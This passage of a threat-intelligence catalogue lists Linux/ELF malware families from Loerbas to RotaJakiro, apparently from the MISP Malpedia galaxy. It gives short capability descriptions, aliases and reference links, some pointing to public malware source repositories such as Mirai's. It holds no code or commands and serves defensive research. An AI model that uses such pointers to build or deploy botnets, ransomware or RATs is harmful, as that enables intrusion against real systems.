https://analyst1.com/ransomware-diaries-volume-3-lockbits-secrets/

https://github.com/prodaft/malware-ioc/tree/master/PTI-257

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/

https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/

https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html

https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://securelist.com/crimeware-report-lockbit-switchsymb/110068/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/

Loerbas

Loader and Cleaner components used in attacks against high-performance computing centers in Europe.

The tag is: misp-galaxy:malpedia="Loerbas"

Loerbas is also known as:

Table 2390. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.loerbas

https://twitter.com/nunohaien/status/1261281419483140096

https://atdotde.blogspot.com/2020/05/high-performance-hackers.html

https://www.cadosecurity.com/2020/05/16/1318/

Log Collector

The tag is: misp-galaxy:malpedia="Log Collector"

Log Collector is also known as:

Table 2391. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.log_collector

https://blog.netlab.360.com/dacls-the-dual-platform-rat/

Lootwodniw

The tag is: misp-galaxy:malpedia="Lootwodniw"

Lootwodniw is also known as:

Table 2392. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.lootwodniw

https://twitter.com/ddash_ct/status/1326887125103616000

Manjusaka (ELF)

Cisco Talos compared this RAT to Cobalt Strike and Sliver. Written in Rust.

The tag is: misp-galaxy:malpedia="Manjusaka (ELF)"

Manjusaka (ELF) is also known as:

Table 2394. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.manjusaka

https://github.com/avast/ioc/tree/master/Manjusaka

https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html

Matryosh

The tag is: misp-galaxy:malpedia="Matryosh"

Matryosh is also known as:

Table 2396. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.matryosh

https://blog.netlab.360.com/matryosh-botnet-is-spreading-en/

Midrashim

An x64 ELF file infector with a non-destructive payload.

The tag is: misp-galaxy:malpedia="Midrashim"

Midrashim is also known as:

Table 2399. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.midrashim

https://www.guitmz.com/linux-midrashim-elf-virus/

https://github.com/guitmz/midrashim

Mirai (ELF)

Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.

The tag is: misp-galaxy:malpedia="Mirai (ELF)"

Mirai (ELF) is also known as:

  • Katana

Table 2401. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/

https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/

https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/

https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet

https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html

https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/

https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/

https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/

https://forensicitguy.github.io/extracting-indicators-from-packed-mirai/

https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093

https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx

https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/

https://unit42.paloaltonetworks.com/new-mirai-variant-mukashi/

https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/

https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/

https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign

https://www.netscout.com/blog/asert/ddos-attack-campaign-targeting-multiple-organizations-ukraine

https://cert.gov.ua/article/37139

https://exchange.xforce.ibmcloud.com/collection/InfectedNight-Mirai-Variant-With-Massive-Attacks-On-Our-Honeypots-dbea3e9e39b8265e729545fa798e4d18

https://isc.sans.edu/diary/22786

https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/

https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/

https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability

https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/

https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot

http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/

https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/

https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html

https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group

https://synthesis.to/2021/06/30/automating_string_decryption.html

https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/

https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html

https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space

https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt

https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts

https://community.riskiq.com/article/d8a78daf

https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet

https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai

https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039

https://unit42.paloaltonetworks.com/cve-2020-17496/

https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/

https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/

https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/

https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/

https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html

https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/

https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/

https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/

https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/

https://deform.co/the-infamous-mirai-trojan-evolves-new-pandora-variant-targets-android-tvs/

https://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html

https://www.cisecurity.org/insights/blog/top-10-malware-march-2022

https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/

https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/

https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/

http://osint.bambenekconsulting.com/feeds/

https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://www.youtube.com/watch?v=KVJyYTie-Dc

https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/

https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/

https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/

https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants

https://github.com/jgamblin/Mirai-Source-Code

Monti

A ransomware, derived from the leaked Conti source code.

The tag is: misp-galaxy:malpedia="Monti"

Monti is also known as:

Table 2404. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.monti

https://resources.prodaft.com/wazawaka-report

https://www.trendmicro.com/en_us/research/23/h/monti-ransomware-unleashes-a-new-encryptor-for-linux.html

MrBlack

MrBlack, first identified in May 2014 by Russian security firm Dr. Web, is a botnet that targets Linux OS and is designed to conduct distributed denial-of-service (DDoS) attacks. In May 2015, Incapsula clients suffered a large-scale DDoS attack which the company attributed to network traffic generated by tens of thousands of small office/home office (SOHO) routers infected with MrBlack. This massive botnet spans over 109 countries, especially in Thailand and Brazil.

MrBlack scans for and infects routers that have not had their default login credentials changed and that allow remote access to HTTP and SSH via port 80 and port 22, respectively. One of the most impacted router brands is Ubiquiti, a U.S.-based firm that provides bulk network hub solutions for internet service providers to lease to their customers. Once a vulnerable router is compromised and MrBlack is injected into the system, a remote server is contacted and system information from the device is transmitted. This allows the host server to receive commands in order to perform different types of DDoS attacks, download and execute files, and terminate processes.

The tag is: misp-galaxy:malpedia="MrBlack"

MrBlack is also known as:

  • AESDDoS

  • Dofloo

Table 2408. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack

https://news.drweb.com/?i=5760&c=23&lng=en

https://blog.syscall.party/post/aes-ddos-analysis-part-1/

https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf

https://www.bleepingcomputer.com/news/security/exposed-docker-apis-abused-by-ddos-cryptojacking-botnet-malware/

https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf

Mumblehard

The tag is: misp-galaxy:malpedia="Mumblehard"

Mumblehard is also known as:

Table 2409. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.mumblehard

https://www.welivesecurity.com/wp-content/uploads/2015/04/mumblehard.pdf

Nextcry

Ransomware used against Linux servers.

The tag is: misp-galaxy:malpedia="Nextcry"

Nextcry is also known as:

Table 2410. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.nextcry

https://www.bleepingcomputer.com/news/security/new-nextcry-ransomware-encrypts-data-on-nextcloud-linux-servers/

Nimbo-C2 (ELF)

According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It’s written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).

The tag is: misp-galaxy:malpedia="Nimbo-C2 (ELF)"

Nimbo-C2 (ELF) is also known as:

Table 2412. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.nimbo_c2

https://github.com/itaymigdal/Nimbo-C2

NiuB

Golang-based RAT that offers execution of shell commands and a download-and-run capability.

The tag is: misp-galaxy:malpedia="NiuB"

NiuB is also known as:

Table 2413. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.niub

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://labs.bitdefender.com/2020/10/theres-a-new-a-golang-written-rat-in-town/

NOTROBIN

FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

The tag is: misp-galaxy:malpedia="NOTROBIN"

NOTROBIN is also known as:

  • remove_bds

Table 2414. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/

https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html

https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/

https://news.sophos.com/en-us/2020/05/21/asnarok2/

https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html

https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/

https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought

OrBit

According to Stormshield, OrBit is a two-stage malware that appeared in July 2022 and was discovered by Intezer Labs. Acting as a stealer and backdoor on 64-bit Linux systems, it consists of an executable acting as a dropper and a dynamic library.

The tag is: misp-galaxy:malpedia="OrBit"

OrBit is also known as:

Table 2415. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.orbit

https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/

p0sT5n1F3r

According to Yarix Digital Security, this is malware that sniffs HTTPS traffic, implemented as an Apache module.

The tag is: misp-galaxy:malpedia="p0sT5n1F3r"

p0sT5n1F3r is also known as:

Table 2417. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.p0st5n1f3r

https://www.vargroup.it/wp-content/uploads/2019/10/ReverseEngineering_SecurityReport_EN_2019.10.16-2.pdf

P2Pinfect

P2Pinfect is a fast-growing multi-platform botnet, the purpose of which is still unknown. Written in Rust, it is compatible with Windows and Linux, including a MIPS variant for Linux-based routers and IoT devices. It is capable of brute forcing SSH logins and exploiting Redis servers in order to propagate itself both to random IPs on the internet and to hosts it can find references to in files present on the infected system.

The tag is: misp-galaxy:malpedia="P2Pinfect"

P2Pinfect is also known as:

Table 2418. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.p2pinfect

https://www.cadosecurity.com/p2pinfect-new-variant-targets-mips-devices/

https://www.cadosecurity.com/redis-p2pinfect/

https://www.cadosecurity.com/cado-security-labs-researchers-witness-a-600x-increase-in-p2pinfect-traffic/

https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/

pbot

P2P botnet derived from the Mirai source code.

The tag is: misp-galaxy:malpedia="pbot"

pbot is also known as:

Table 2419. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.pbot

https://www.cert.org.cn/publish/main/11/2021/20210628133948926376206/20210628133948926376206_.html

Pink

A botnet with P2P and centralized C&C capabilities.

The tag is: misp-galaxy:malpedia="Pink"

Pink is also known as:

Table 2424. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.pink

https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/

https://blog.netlab.360.com/pink-en/

Poseidon (ELF)

Part of Mythic C2, written in Golang.

The tag is: misp-galaxy:malpedia="Poseidon (ELF)"

Poseidon (ELF) is also known as:

Table 2426. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.poseidon

https://cert.gov.ua/article/6123309

https://github.com/MythicAgents/poseidon

PRISM

The tag is: misp-galaxy:malpedia="PRISM"

PRISM is also known as:

  • waterdrop

Table 2427. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.prism

https://cybersecurity.att.com/blogs/labs-research/prism-attacks-fly-under-the-radar

PrivetSanya

Black Lotus Labs identified malware for the Windows Subsystem for Linux (WSL). Mostly written in Python but compiled as Linux ELF files.

The tag is: misp-galaxy:malpedia="PrivetSanya"

PrivetSanya is also known as:

Table 2428. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.privet_sanya

https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/

Pro-Ocean

Unit 42 describes this as a malware used by Rocke Group that deploys an XMRig miner.

The tag is: misp-galaxy:malpedia="Pro-Ocean"

Pro-Ocean is also known as:

Table 2430. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.pro_ocean

https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/

https://seguranca-informatica.pt/new-cryptojacking-malware-called-pro-ocean-is-now-attacking-apache-oracle-and-redis-servers/

pupy (ELF)

Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in Python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure Python, PowerShell and APK. Most of the loaders bundle an embedded Python runtime, Python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a Python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, and load remote Python code, Python packages and Python C-extensions from memory.

The tag is: misp-galaxy:malpedia="pupy (ELF)"

pupy (ELF) is also known as:

Table 2431. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy

https://github.com/n1nj4sec/pupy

https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf

QNAPCrypt

The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:

  1. The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.

  2. Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.

  3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.

The tag is: misp-galaxy:malpedia="QNAPCrypt"

QNAPCrypt is also known as:

  • eCh0raix

Table 2433. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt

https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/

https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/

https://www.anomali.com/blog/the-ech0raix-ransomware

https://www.qnap.com/en/security-advisory/QSA-20-02

https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/

https://www.ibm.com/downloads/cas/Z81AVOY7

https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf

https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt

https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought

https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/

QUIETEXIT

Mandiant observed this backdoor being used by UNC3524. It is based on the open-source Dropbear SSH source code.

The tag is: misp-galaxy:malpedia="QUIETEXIT"

QUIETEXIT is also known as:

Table 2435. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.quietexit

https://www.mandiant.com/resources/unc3524-eye-spy-email

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

RansomEXX (ELF)

According to SentinelOne, RansomEXX (aka Defray, Defray777), a multi-pronged extortion threat, has been observed in the wild since late 2020. RansomEXX is associated with attacks against the Texas Department of Transportation, Groupe Atlantic, and several other large enterprises. There are Windows and Linux variants of this malware family, and they are known for their limited and exclusive targeting.

The tag is: misp-galaxy:malpedia="RansomEXX (ELF)"

RansomEXX (ELF) is also known as:

  • Defray777

Table 2439. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware

https://securityintelligence.com/x-force/ransomexx-upgrades-rust/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195

https://www.youtube.com/watch?v=qxPXxWMI2i4

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.ic3.gov/Media/News/2021/211101.pdf

https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.sentinelone.com/anthology/ransomexx/

https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/

RansomExx2

According to IBM Security X-Force, this is a new but functionally very similar version of RansomExx, fully rewritten in Rust and internally referred to as RansomExx2.

The tag is: misp-galaxy:malpedia="RansomExx2"

RansomExx2 is also known as:

Table 2440. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx2

https://securityintelligence.com/x-force/ransomexx-upgrades-rust/

RaspberryPiBotnet

The tag is: misp-galaxy:malpedia="RaspberryPiBotnet"

RaspberryPiBotnet is also known as:

Table 2442. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.raspberrypibotnet

https://kindredsec.com/2019/06/03/code-analysis-of-basic-cryptomining-malware/

rat_hodin

The tag is: misp-galaxy:malpedia="rat_hodin"

rat_hodin is also known as:

Table 2443. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.rat_hodin

https://github.com/Thibault-69/RAT-Hodin-v2.5

rbs_srv

The tag is: misp-galaxy:malpedia="rbs_srv"

rbs_srv is also known as:

Table 2444. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.rbs_srv

https://github.com/Thibault-69/Remote_Shell

RedAlert Ransomware

Ransomware that targets Linux VMware ESXi servers. Its encryption procedure uses the NTRUEncrypt public-key encryption algorithm.

The tag is: misp-galaxy:malpedia="RedAlert Ransomware"

RedAlert Ransomware is also known as:

  • N13V

Table 2446. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.red_alert

https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://www.bleepingcomputer.com/news/security/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers/

REvil (ELF)

ELF version of win.revil targeting VMware ESXi hypervisors.

The tag is: misp-galaxy:malpedia="REvil (ELF)"

REvil (ELF) is also known as:

  • REvix

Table 2449. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.revil

https://home.treasury.gov/news/press-releases/jy0471

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom

https://twitter.com/IntezerLabs/status/1452980772953071619

http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html

https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/

https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/

https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version

https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya

https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/

https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://twitter.com/VK_Intel/status/1409601311092490248?s=20

https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/

https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/

https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf

https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/

https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/

https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/

https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released

https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend

https://angle.ankura.com/post/102hcny/revix-linux-ransomware

https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil

https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf

https://www.youtube.com/watch?v=mDUMpYAOMOo

https://analyst1.com/file-assets/History-of-REvil.pdf

https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin

https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil

https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo

https://twitter.com/VK_Intel/status/1409601311092490248

https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5

https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20

https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ

https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide

https://threatpost.com/ransomware-revil-sites-disappears/167745/

https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment

https://malienist.medium.com/revix-linux-ransomware-d736956150d0

https://www.flashpoint-intel.com/blog/revil-disappears-again/

https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021

https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa

https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/

https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html

https://www.bbc.com/news/technology-59297187

https://github.com/f0wl/REconfig-linux

https://ke-la.com/will-the-revils-story-finally-be-over/

https://www.youtube.com/watch?v=ptbNMlWxYnE

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

Rex

The tag is: misp-galaxy:malpedia="Rex"

Rex is also known as:

Table 2450. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex

https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/

RHOMBUS

The tag is: misp-galaxy:malpedia="RHOMBUS"

RHOMBUS is also known as:

Table 2451. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.rhombus

https://old.reddit.com/r/LinuxMalware/comments/fh3zar/memo_rhombus_an_elf_bot_installerdropper/

Roboto

P2P botnet discovered by Netlab 360. The botnet infects Linux servers via the Webmin RCE vulnerability (CVE-2019-15107), which allows attackers to run malicious code with root privileges and take over older Webmin versions. Based on the Netlab 360 analysis, the bot implements seven functions: reverse shell, self-uninstall, gathering of process network information, gathering of bot information, execution of system commands, execution of encrypted files fetched from URLs, and DDoS attacks with four methods: ICMP flood, HTTP flood, TCP flood and UDP flood.

The tag is: misp-galaxy:malpedia="Roboto"

Roboto is also known as:

Table 2453. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.roboto

https://www.zdnet.com/article/new-roboto-botnet-emerges-targeting-linux-servers-running-webmin

https://blog.netlab.360.com/the-awaiting-roboto-botnet-en

RotaJakiro

RotaJakiro is a stealthy Linux backdoor which remained undetected between 2018 and 2021. The malware uses rotating encryption to protect both the resource information embedded in the sample and its C2 communication, combining AES, XOR and ROTATE encryption with ZLIB compression.

